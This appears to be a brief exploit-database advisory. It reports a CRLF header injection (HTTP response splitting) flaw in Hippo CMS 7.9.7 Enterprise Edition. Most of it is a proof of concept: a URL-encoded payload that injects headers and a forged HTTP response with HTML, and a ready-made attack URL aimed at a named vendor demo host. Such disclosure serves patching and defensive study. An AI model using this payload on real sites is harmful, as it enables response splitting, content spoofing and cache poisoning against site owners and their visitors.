Hippo CMS version 7.9.7 Enterprise Edition suffers from a CRLF header injection vulnerability.
2fb4fa85ea66e995db6ab55d0538b5311601d0e89367a86fc0e5f6c567ccbaa7
# Affected software: hippo cms
# Type of vulnerability:crlf
# URL:https://cms.demo.onehippo.com
# Discovered by: provensec
# Website: provensec.com
#version: CMS 7.9.7 Enterprise Edition
# Proof of concept
payload :
advanced%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-
Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a<html>Sorry,%20ding
dong</html>
demo:
https://cms.demo.onehippo.com/?0&advanced%0D%0AContent-Length:+0%0D%0A%0D%0AHTTP/1.1+200+OK%0D%0AContent-Type:+text/html%0D%0AContent-Length:+35%0D%0A%0D%0A%3Chtml%3ESorry,+System+Down%3C/html%3E
screenshot:http://prntscr.com/6rxb6l